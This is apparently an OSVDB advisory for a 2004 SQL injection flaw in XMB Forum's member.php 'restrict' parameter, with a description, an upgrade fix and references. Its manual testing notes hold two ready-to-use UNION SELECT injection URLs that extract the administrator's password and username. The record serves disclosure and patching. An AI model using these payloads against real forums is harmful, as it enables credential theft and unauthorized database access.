XMB Forum member.php restrict Parameter SQL Injection

2004-03-26T09:21:15
ID OSVDB:14990
Type osvdb
Reporter Janek Vind "waraxe"(come2waraxe@yahoo.com)
Modified 2004-03-26T09:21:15

Description

Vulnerability Description

XMB Forum contains a flaw that may allow an attacker to inject arbitrary SQL queries. The issue is due to the restrict variable in the member.php script not being properly sanitized and may allow an attacker to inject or manipulate SQL queries.

Solution Description

Upgrade to version 1.9.1 Final or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

XMB Forum contains a flaw that may allow an attacker to inject arbitrary SQL queries. The issue is due to the restrict variable in the member.php script not being properly sanitized and may allow an attacker to inject or manipulate SQL queries.

Manual Testing Notes

http://[victim]/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=- 99%20GROUP%20BY%20p.fid%20UNION%20SELECT%20password,null,99%20FROM%20xmb_members%20WHERE%20uid=1%20LIMIT%201%20/*

http://[victim]/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY%20p.fid%20UNION%20SELECT%20username,null,99%20FROM%20xmb_members%20WHERE%20uid=1%20LIMIT%201%20/*

References:

Vendor URL: http://www.xmbforum.com/ Secunia Advisory ID:11230 Related OSVDB ID: 14983 Related OSVDB ID: 14984 Related OSVDB ID: 16886 Related OSVDB ID: 16885 Related OSVDB ID: 14982 Related OSVDB ID: 14985 Related OSVDB ID: 14988 Related OSVDB ID: 14991 Related OSVDB ID: 4643 Related OSVDB ID: 14986 Related OSVDB ID: 14987 Related OSVDB ID: 14989 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0265.html Keyword: waraxe-2004-SA#012 CVE-2004-1864